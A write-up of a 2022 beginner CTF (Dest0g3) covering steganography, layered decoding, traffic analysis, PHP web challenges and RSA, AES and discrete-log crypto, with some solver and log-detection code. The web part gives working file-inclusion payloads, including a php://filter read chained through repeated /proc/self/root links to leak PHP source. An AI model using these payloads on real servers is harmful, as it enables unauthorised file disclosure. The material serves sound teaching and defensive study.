Dest0g3 520 Newcomer Competition


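Dest0g3 is recruiting for the first time!

Dest0g3 Team has gradually grown to have members across major universities and security companies, and over the past six months it has placed 10th at L3HCTF, 6th at SCTF and 4th at SUSCTF.

The first Dest0g3 520 Newcomer Competition puts more emphasis on how well CTFers have mastered the fundamentals. The challenges run from easy to hard and suit players at every stage of learning; the level is pure beginner.

Dest0g3 looks forward to more new members joining. If you are interested, submit your write-up and résumé after the competition, or contact @Dest0g3 Team (QQ: 1115230222).

Competition time: 2022.5.20 10:00 - 5.27 10:00

Challenge categories: Web, Pwn, Misc, Crypto, Re, AI, BlockChain

Difficulty: beginner

Competition type: individual

Competition QQ group: 923945203

Individual prizes: the top 10 overall and the top three in each category each receive a copy of the book "From 0 to 1: The CTFer's Road to Growth" (《从0到1:CTFer成长之路》) and a custom USB drive (32G)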

Misc

Welcome to fxxking DestCTF

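**Challenge description:** Follow the official account and reply: Give me the fxxking flag

**Attachment download:** https://files.buuoj.cn/files/8fc59c32ce5bcf7da3917ad4a3a023ba/jpg

Solution:

Drag the attachment into a browser to view it. It shows a QR code; scan it to follow the official account, then send the text given in the hint: Give me the fxxking flag

Flag obtained: Dest0g3{W31c0m3_t0_DestCTF2022!}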

Pngenius

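Challenge description:

**Attachment download:** https://files.buuoj.cn/files/5a64d4c2532f28b79aa99089c3f76ff5/Dest0g3.png

Solution:

1. The image is a PNG, so the first thing to suspect is LSB steganography. Open it in Stegsolve.

The Red 0, Green 0 and Blue 0 planes show anomalies.

2. Use Stegsolve's built-in Data Extract tool to inspect these three anomalous planes.

3. This yields the password for an archive. Go back to the image, scan it with binwalk and extract the embedded archive.

4. Enter the archive password Weak_Pas5w0rd, open the archive and get flag.txt.

Flag obtained: Dest0g3{2908C1AA-B2C1-B8E6-89D1-21B97D778603}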

EasyEncode

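**Challenge description:** Enjoy Decoding

**Attachment download:** https://files.buuoj.cn/files/2fb77a72cba82a4c9a749998a1073e58/encode.zip

Solution:

1. Download the attachment. It is a ZIP file; extracting it shows that it is encrypted, so open it in 010 Editor to take a look.

2. It is not pseudo-encryption, so try brute-forcing it with ARCHPR, with the password length set to 4-6.

This gives the password 100861. Extract the archive and open the text file, which contains Morse code.

3. The decoding process is as follows:

Use the online tool Online Morse Code Translator (lddgo.net).

This gives a string of hex. Convert it to characters with the online tool HEX to Characters (hex, gb2312, gbk, utf8, Chinese internal code conversion) - The X Online Tools (the-x.cn):

This gives a string of Unicode escapes. Use the online tool Unicode Encoding Converter - Webmaster Tools (chinaz.com).

"%3D" is the URL encoding of "=", so the next step is Base64 decoding, using the online tool: Base64 Decode / Base64 Encode (UTF8, GB2312, UTF16, GBK, binary, hex) - The X Online Tools (the-x.cn)

Flag obtained: Dest0g3{Deoding_1s_e4sy_4_U}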

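Do you know js?

Challenge description:

**Attachment download:** https://files.buuoj.cn/files/5f1fc294b6468f733b774ceee6106062/flag

Solution:

1. Download the attachment. Being lazy and not wanting to open 010 Editor, I dropped the attachment straight into the browser, which handled it automatically and downloaded a flag.zip file.

2. Open the archive. It contains a pile of XML files; drop them straight into the browser.

In document.xml there are three strings that look like Base64. Concatenating and decoding them gives: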
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">Do you know js</dpiAwareness>
<script language="javascript">document.write(unescape('%3Chtml%3E%0A%3Cbody%3E%0A%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EDo%20You%20Know%20js%3C%2Ftitle%3E%0A%3CHTA%3AAPPLICATION%0A%20%20APPLICATIONNAME%3D%22Do%20You%20Know%20js%22%0A%20%20ID%3D%22Inception%22%0A%20%20VERSION%3D%221.0%22%0A%20%20SCROLL%3D%22no%22%2F%3E%0A%20%0A%3Cstyle%20type%3D%22text%2Fcss%22%3E%0A%3C%2Fhead%3E%0A%20%20%20%20%3Cdiv%20id%3D%22feature%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22content%0A%09%09%09%09%3C%2Fstyle%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ch1%20id%3D%22unavailable%22%20class%3D%22loading%22%3EBuilding%20js.....%3C%2Fh1%3E%0A%09%09%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20language%3D%22javascript%22%3E%0A%09%09%09%09%09function%20RunFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20var%20WshShell%20%3D%20new%20ActiveXObject%28%22WScript.Shell%22%29%3B%0A%09%09%09%09%09WshShell.Run%28%22notepad%20%25windir%25%2FDesktop%2Fjs.txt%22%2C%201%2C%20false%29%3B%0A%20%20%20%20%20%20%20%20%20%20%2F*%20var%20oExec%20%3D%20WshShell.Exec%28%22notepad%22%29%3B%20*%2F%0A%09%09%09%09%09%7D%0A%09%09%09%09%3C%2Fscript%3E%0A%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%3Cbody%3E%0A%09%3Cinput%20type%3D%22button%22%20value%3D%22Implant%20Inception%20Here%22%20onclick%3D%22RunFile%28%29%3B%22%2F%3E%0A%09%3Cp%20style%3D%22color%3Awhite%3B%22%3E%0A%0A%2B%2B%2B%2B%2B%20%2B%2B%5B-%3E%20%2B%2B%2B%2B%2B%20%2B%2B%3C%5D%3E%20%2B%2B%2B..%20%2B%2B.-.%20%2B%2B.--%20--.%2B%2B%20%2B%2B.--%20%0A-.-.-%20--.%2B%2B%20%2B%2B%2B%2B.%0A%2B.---%20-..%2B%2B%20%2B%2B.%3C%2B%20%2B%2B%5B-%3E%20%2B%2B%2B%3C%5D%20%3E%2B%2B.%3C%20%2B%2B%2B%5B-%20%0A%3E---%3C%20%5D%3E---%20---.%2B%20%2B%2B%2B%2B.%20-----%0A.%2B%2B%2B.%20...--%20---.%2B%20%2B%2B%2B%2B.%20---.%2B%20%2B%2B.--%20---.%2B%20%2B%2B%2B%2B.%20---..%20%2B%2B%2B%2B%2B%20%2B.---%20----.%0A%3C%2B%2B%2B%2B%20%5B-%3E%2B%2B%20%2B%2B%3C%5D%3E%20%2B%2B.%3C%2B%20%2B%2B%2B%5B-
%20%3E----%20%3C%5D%3E-.%20---.%2B%0A%20%2B%2B%2B%2B%2B%20.----%20-.%2B%2B.%20%2B%2B.%2B.%0A--.--%20.%3C%2B%2B%2B%20%2B%5B-%3E%2B%20%2B%2B%2B%3C%5D%20%3E%2B%2B.%3C%20%2B%2B%2B%2B%5B%20-%3E---%20-%3C%5D%3E-%20%0A.%2B.-.%20---.%2B%20%2B%2B.%2B.%20-.%2B%2B%2B%0A%2B.---%20--.%3C%2B%20%2B%2B%2B%5B-%20%3E%2B%2B%2B%2B%20%3C%5D%3E%2B%2B%20.%3C%2B%2B%2B%20%5B-%3E--%20-%3C%5D%3E-%20----.%20----.%20%2B.%2B%2B%2B%20%2B.---%0A-.---%20.%2B%2B%2B.%20-..%3C%2B%20%2B%2B%2B%5B-%20%3E%2B%2B%2B%2B%20%3C%5D%3E%2B%2B%20%0A.%3C%2B%2B%2B%20%2B%5B-%3E-%20---%3C%5D%20%3E-.%2B%2B%20%2B%2B%2B.-%20----.%0A%2B%2B%2B..%20---.%2B%20%2B%2B.--%20--.%2B.%20..%2B%2B%2B%20%2B.-.-%20----.%20%2B%2B%2B%2B%2B%20%0A.----%20.%2B.%2B%2B%20%2B%2B.--%20--.%2B%2B%0A%2B%2B.-.%20----.%20%2B.-.%2B%20%2B%2B%2B%2B.%20%0A%3C%2B%2B%2B%5B%20-%3E%2B%2B%2B%20%3C%5D%3E%2B%2B%20%2B%2B.%3C%0A%3C%2Fp%3E%0A%3C%2Fbody%3E%0A%3C%2Fbody%3E%0A%20%20%3C%2Fhtml%3E%0A'));</script>


The decoded content is recognizably URL-encoded. Decode it with the online tool UrlDecode / UrlEncode (GB2312, UTF8) - The X Online Tools (the-x.cn):
<html>
<body>

<!DOCTYPE html>
<html>
<head>
<title>Do You Know js</title>
<HTA:APPLICATION
APPLICATIONNAME="Do You Know js"
ID="Inception"
VERSION="1.0"
SCROLL="no"/>

<style type="text/css">
</head>
<div id="feature">
<div id="content
</style>
<h1 id="unavailable" class="loading">Building js.....</h1>
<script type="text/javascript" language="javascript">
function RunFile() {
var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Run("notepad %windir%/Desktop/js.txt", 1, false);
/* var oExec = WshShell.Exec("notepad"); */
}
</script>
</div>
</div>
<body>
<input type="button" value="Implant Inception Here" onclick="RunFile();"/>
<p style="color:white;">

+++++ ++[-> +++++ ++<]> +++.. ++.-. ++.-- --.++ ++.--
-.-.- --.++ ++++.
+.--- -..++ ++.<+ ++[-> +++<] >++.< +++[-
>---< ]>--- ---.+ ++++. -----
.+++. ...-- ---.+ ++++. ---.+ ++.-- ---.+ ++++. ---.. +++++ +.--- ----.
<++++ [->++ ++<]> ++.<+ +++[- >---- <]>-. ---.+
+++++ .---- -.++. ++.+.
--.-- .<+++ +[->+ +++<] >++.< ++++[ ->--- -<]>-
.+.-. ---.+ ++.+. -.+++
+.--- --.<+ +++[- >++++ <]>++ .<+++ [->-- -<]>- ----. ----. +.+++ +.---
-.--- .+++. -..<+ +++[- >++++ <]>++
.<+++ +[->- ---<] >-.++ +++.- ----.
+++.. ---.+ ++.-- --.+. ..+++ +.-.- ----. +++++
.---- .+.++ ++.-- --.++
++.-. ----. +.-.+ ++++.
<+++[ ->+++ <]>++ ++.<
</p>
</body>
</body>
</html>
'));</script>


This is recognizable as Brainfuck/Ook! encoding. Decode it with the online tool: [Brainfuck/Ook! Obfuscation/Encoding splitbrain.org]

The decoded output is:

446573743067337B38366661636163392D306135642D343034372D623730322D3836636233376162373762327D


Then simply convert the hex to text, using the online tool HEX to Characters (hex, gb2312, gbk, utf8, Chinese internal code conversion) - The X Online Tools (the-x.cn)

Flag obtained: Dest0g3{86facac9-0a5d-4047-b702-86cb37ab77b2}
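The three layers of this challenge (URL encoding, Brainfuck, hex) can be peeled off locally instead of pasting the data into online tools. The following is an added example, not part of the original write-up; the function names and the sample program are constructed for illustration.

```python
from urllib.parse import quote, unquote

def run_brainfuck(src: str, max_steps: int = 1_000_000) -> str:
    """Interpret a Brainfuck program that takes no input; return its output."""
    code = [c for c in src if c in "+-<>[]."]    # everything else is ignored
    jump, stack = {}, []
    for i, c in enumerate(code):                  # pair up the brackets once
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):                    # cap so untrusted input cannot loop forever
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ">":
            ptr = (ptr + 1) % len(tape)
        elif c == "<":
            ptr = (ptr - 1) % len(tape)
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif (c == "[") == (tape[ptr] == 0):      # '[' on zero, or ']' on non-zero
            pc = jump[pc]
        pc += 1
    raise RuntimeError("step limit exceeded")

def decode_layers(url_encoded: str) -> str:
    """URL-decode, run the Brainfuck, then hex-decode its output."""
    # unquote, not unquote_plus: '+' is a Brainfuck instruction, not a space
    return bytes.fromhex(run_brainfuck(unquote(url_encoded))).decode()

# Constructed sample, not the challenge data: Brainfuck that prints "4F4B"
# (the hex of "OK"), URL-encoded like the script found in document.xml.
SAMPLE_BF = ("+" * 6 + "[>" + "+" * 8 + "<-]>" + "+" * 4 + "."
             + "+" * 18 + "." + "-" * 18 + "." + "+" * 14 + ".")
SAMPLE = quote(SAMPLE_BF)

if __name__ == "__main__":
    print(decode_layers(SAMPLE))
```

Running the interpreter offline also keeps script content of unknown origin away from third-party sites.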

StrangeTraffic

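Challenge description:

**Attachment download:** https://files.buuoj.cn/files/c329bafcc0113003c060d62f8f99b2e7/StrangeTraffic.pcapng

Solution:

1. Download the attachment, open the file in a Kali VM and analyze it with Wireshark. It is clearly Modbus industrial-control traffic. Follow the TCP stream; stream 0 contains something suspicious, so switch the display to Hex Dump.

2. The end of the stream contains data that looks like Base64. Extract it by hand: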

RGVzdDBnM3szMUE1QkVBNi1GMjBELUYxOEEtRThFQS0yOUI0RjI1NzEwOEJ9

Base64-decoding it gives the flag: Dest0g3{31A5BEA6-F20D-F18A-E8EA-29B4F257108B}

EasyWord

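**Challenge description:** Let the word tell u

**Attachment download:** https://files.buuoj.cn/files/aae5e40774fcd4089557007b1b030f41/EasyWord.zip

Solution:

Download the attachment and open the archive to get an encrypted docm file. The hint says the password is six lowercase letters and gives the third and fifth characters, so I considered using the tool AOPRT:

I brute-forced it several times and the results were all wrong; don't give up on this approach.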

Web

phpdest

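Challenge description:

**Attachment download:** http://d10eb908-5734-4807-9b12-493d578d495c.node4.buuoj.cn:81/ (the environment is permanently available on BUUCTF; you can start it yourself)

Solution:

1. Open the link to get the source code. The first things that came to mind were file inclusion and stacked injection. Build a payload to try: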
?file=php://filter/read=convert.base64-encode/resource=flag.php

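Nothing is echoed back. Auditing the PHP code reveals the require_once function, which is the key.

The require_once() statement includes and runs the specified file during script execution. It behaves like require(); the only difference is that if the code in the file has already been included, it is not included again.

A small trick in recent PHP versions: when the path given to require_once passes through many levels of symbolic links, the hash match behind "once" fails outright, so the file is included a second time.

`/proc/[pid]` records runtime status information, and `/proc/self` refers to the current process (the process's own pid), much like `this` inside a class.

`/proc/self/root/` is a symbolic link to `/`.

Build the payload: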
?file=php://filter/read=convert.base64-encode/resource/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

This returns the source of flag.php; Base64-decode it to get the flag:

Dest0g3{f05260c1-70e9-481b-89b1-eb397377f621}
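Both payloads above leave a distinctive trace in the query string: a stream wrapper in a parameter, and `/proc/self/root` chained onto itself. The following is an added example of detection logic over web access logs, not part of the original write-up; the patterns, function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WRAPPER = re.compile(r"^\s*(?:php|data|phar|zip|expect|file|glob)://", re.I)
PROC_CHAIN = re.compile(r"(?:/proc/self/root){2,}")

def findings_for(target: str) -> list[str]:
    """Flag include-style abuse in the query string of one request target."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; decode again for double encoding
        if WRAPPER.search(value):
            hits.append(f"{name}: stream wrapper in parameter")
        if "convert.base64-encode" in value.lower():
            hits.append(f"{name}: php://filter base64 read")
        if PROC_CHAIN.search(value):
            hits.append(f"{name}: chained /proc/self/root symlinks")
    return hits

def scan(log_lines):
    """Return {line_number: findings} for lines with at least one finding."""
    report = {}
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m and (hits := findings_for(m.group(1))):
            report[no] = hits
    return report

# Constructed access-log lines (client addresses from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/May/2022:10:01:00 +0000] "GET /?file=about.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [20/May/2022:10:02:00 +0000] "GET /?file=php://filter/read='
    'convert.base64-encode/resource=flag.php HTTP/1.1" 200 2048',
    '192.0.2.11 - - [20/May/2022:10:03:00 +0000] "GET /?file=php://filter/read='
    'convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root'
    '/var/www/html/flag.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG).items():
        print(line_no, hits)
```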

EasyPHP

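**Challenge description:** Post something

Attachment download: d7cb2110-b7b2-4ff0-9ce7-a5788de17012.node4.buuoj.cn:81 (the environment is permanently available on BUUCTF; you can start it yourself)

Solution:

1. Open the link to get the page:

2. There is nothing else to do here, so go straight to auditing the code: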
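<?php
highlight_file(__FILE__); // syntax-highlights this file; not relevant to the solution
include "fl4g.php"; // pulls in fl4g.php
$dest0g3 = $_POST['ctf']; // $dest0g3 takes the POST parameter 'ctf'
$time = date("H"); // time-based checks, same for the next two
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){ // prints $fl4g only if a time value is out of range, otherwise "Try harder!"; the time can obviously never be out of range
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler( // this function is the way in (explained below): the handler prints $fl4g, so it is enough to make the script raise an error
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?> Try harder!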

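Key point: the set_error_handler() function sets a user-defined error handler function. It is used to create your own error handling at runtime. It returns the previous error handler, or null on failure.

3. POST an array so that the script raises an error: ctf[]=1. Appending an array to a string in `$fl4g .= $dest0g3;` raises an "Array to string conversion" notice or warning (depending on the PHP version), which invokes the custom handler and prints $fl4g.

Flag obtained: Dest0g3{a57b8d1d-da8f-42ee-a782-3a92bc372ec3}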

Crypto

babyRSA

Challenge description:

**Attachment download:** https://files.buuoj.cn/files/28e6d9906de54ebfdc565f9ef541bcbf/task.py

Solution:

1. Open the attachment, factor n with fofa, and solve it as standard RSA. Run the script to get the flag.
import libnum
from Crypto.Util.number import long_to_bytes

c = 14181751948841206148995320731138166924841307246014981115736748934451763670304308496261846056687977917728671991049712129745906089287169170294259856601300717330153987080212591008738712344004443623518040786009771108879196701679833782022875324499201475522241396314392429412747392203809125245393462952461525539673218721341853515099201642769577031724762640317081252046606564108211626446676911167979492329012381654087618979631924439276786566078856385835786995011067720124277812004808431347148593882791476391944410064371926611180496847010107167486521927340045188960373155894717498700488982910217850877130989318706580155251854
n = 27272410937497615429184017335437367466288981498585803398561456300019447702001403165885200936510173980380489828828523983388730026101865884520679872671569532101708469344562155718974222196684544003071765625134489632331414011555536130289106822732544904502428727133498239161324625698270381715640332111381465813621908465311076678337695819124178638737015840941223342176563458181918865641701282965455705790456658431641632470787689389714643528968037519265144919465402561959014798324908010947632834281698638848683632113623788303921939908168450492197671761167009855312820364427648296494571794298105543758141065915257674305081267
e = 65537
q = 165143607013706756535226162768509114446233024193609895145003307138652758365886458917899911435630452642271040480670481691733000313754732183700991227511971005378010205097929462099354944574007393761811271098947894183507596772524174007304430976545608980195888302421142266401500880413925699125132100053801973969401
p = 165143607013706756535226162768509114446233024193609895145003307138652758365886458917899911435630452642271040480670481691733000313754732183700991227511971005378010205097929462099354944574007393761811271098947894183507596772524174007304430976545608980195888302421142266401500880413925699125132100053801973971467

d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)  # m as a decimal integer
string = long_to_bytes(m)  # plaintext m as bytes
print(string)  # printed in the form b'...'


# b'Dest0g3{96411aad-032c-20a8-bc43-b473f6f08536}'
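The p and q in the script above differ only in their final digits, and primes that close together are exactly what Fermat's method factors on the first try. The following is an added example, not part of the original write-up (which factors n with an external tool); it uses constructed 1024-bit primes and hypothetical helper names instead of the challenge values.

```python
from math import isqrt
E = 65537
SMALL = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)

def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed small bases (enough for a demo)."""
    if n < 2 or any(n % s == 0 for s in SMALL):
        return n in SMALL
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in SMALL:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def next_rsa_prime(start: int) -> int:
    """Smallest odd probable prime p >= start with E not dividing p - 1."""
    c = start | 1
    while not is_probable_prime(c) or (c - 1) % E == 0:
        c += 2
    return c

def fermat_factor(n: int, max_steps: int = 1_000_000):
    """Search a >= ceil(sqrt(n)) until a*a - n is a square b*b; n = (a-b)(a+b)."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    for steps in range(max_steps):
        b = isqrt(a * a - n)
        if b * b == a * a - n:
            return a - b, a + b, steps
        a += 1

def demo():
    q = next_rsa_prime(2**1023 + 2022)   # constructed primes, not the challenge's
    p = next_rsa_prime(q + 2000)         # deliberately only about 2000 above q
    n = p * q
    c = pow(int.from_bytes(b"constructed sample", "big"), E, n)
    f_q, f_p, steps = fermat_factor(n)   # uses n only
    m = pow(c, pow(E, -1, (f_p - 1) * (f_q - 1)), n)
    return (f_q, f_p) == (q, p), steps, m.to_bytes((m.bit_length() + 7) // 8, "big")
```

The step count returned by `demo()` is 0: with a gap this small, the first candidate `a` is already `(p + q) / 2`, so key generation must reject primes that are too close.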


babyAES

Challenge description:

**Attachment download:** https://files.buuoj.cn/files/ded8ebffd78bc71ff21b41701727c875/task.py

Solution:

1. Open the attachment; it is standard AES. Run the script.
from Crypto.Cipher import AES

iv = b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80'
key = b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F'
my_aes = AES.new(key, AES.MODE_CBC, iv)
c = b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07'
flag = my_aes.decrypt(c)
print(flag)

#b'Dest0g3{d0e5fa76-e50f-76f6-9cf1-b6c2d576b6f4}\x00\x00\x00'


ezDLP

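Challenge description:

**Attachment download:** https://files.buuoj.cn/files/67d5c3e2b9ac73c8ebf66665b077e33f/task.py

Solution:

1. Open the attachment. I tried to solve it with the Pohlig-Hellman algorithm but could not work it out, so I searched for how to invert pow() and found that Sage has a function for it. Write the solve script and run it in SageMath (Sage Cell Server (sagemath.org)).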
#Sage
g = 19
p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839870641607412102746854257629226877248337002993023452385472058106944014653401647033456174126976474875859099023703472904735779212010820524934972736276889281087909166017427905825553503050645575935980580803899122224368875197728677516907272452047278523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736573246893588079033524476111268686138924892091575797329915240849862827621736832883215569687974368499436632617425922744658912248644475097139485785819369867604176912652851123185884810544172785948158330991257118563772736929105360124222843930130347670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501371279295621820181402191463184275851324378938021156631501330660825566054528793444353
h = 199533304296625406955683944856330940256037859126142372412254741689676902594083385071807594584589647225039650850524873289407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007735707550914742749524818990843357217489433410647994417860374972468061110200554531819987204852047401539211300639165417994955609002932104372266583569468915607415521035920169948704261625320990186754910551780290421057403512785617970138903967874651050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326538607106089620201074331099713506536192957054173076913374098400489398228161089007898192779738439912595619813699711049380213926849110877231503068464392648816891183318112570732792516076618174144968844351282497993164926346337121313644001762196098432060141494704659769545012678386821212213326455045335220435963683095439867976162
d=discrete_log(h,mod(g,p))
print(d)

#627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133

# Then run the following code in a local environment

from libnum import n2s
print(n2s(627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133))

#Dest0g3{07ed2a6f-182f-a05d-c81e-1318af820a78}
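
The Pohlig-Hellman approach mentioned above reduces a discrete log modulo p to small problems, one per prime-power factor of p - 1, and joins the answers with the CRT. The following is an added example in plain Python, not part of the original write-up and not Sage's implementation; it assumes a constructed prime, 2^61 - 1, whose p - 1 has no prime factor above 1321, and reuses only the base g = 19 from the challenge.

```python
from math import isqrt

def factorize(n: int) -> dict:
    """Trial division; fast when n is smooth (all prime factors small)."""
    f, d = {}, 2
    while d * d <= n:
        while n % d == 0:
            f[d] = f.get(d, 0) + 1
            n //= d
        d += 1
    if n > 1:
        f[n] = f.get(n, 0) + 1
    return f

def bsgs(g: int, h: int, p: int, order: int) -> int:
    """Baby-step giant-step: x in [0, order) with g^x = h (mod p)."""
    m = isqrt(order) + 1
    baby, cur = {}, 1
    for j in range(m):                  # baby steps: g^j
        baby.setdefault(cur, j)
        cur = cur * g % p
    step, y = pow(g, -m, p), h
    for i in range(m):                  # giant steps: h * g^(-i*m)
        if y in baby:
            return i * m + baby[y]
        y = y * step % p
    raise ValueError("h is not in the subgroup generated by g")

def pohlig_hellman(g: int, h: int, p: int) -> int:
    """Solve g^x = h (mod p) via the prime-power factors of p - 1."""
    n, x, mod = p - 1, 0, 1
    for q, e in factorize(n).items():
        qe = q ** e
        # Project into the subgroup of order dividing q^e and solve there.
        xi = bsgs(pow(g, n // qe, p), pow(h, n // qe, p), p, qe)
        # CRT merge: keep x mod `mod`, force x = xi (mod qe).
        x += mod * ((xi - x) * pow(mod, -1, qe) % qe)
        mod *= qe
    return x % n

P = 2**61 - 1   # constructed parameter, not the challenge prime
G = 19          # same base as the challenge

def demo(secret: int = 1234567890123456789) -> bool:
    h = pow(G, secret, P)
    return pow(G, pohlig_hellman(G, h, P), P) == h
```

The work is bounded by the largest prime factor of p - 1, which is why discrete-log parameters need a group order with a large prime factor.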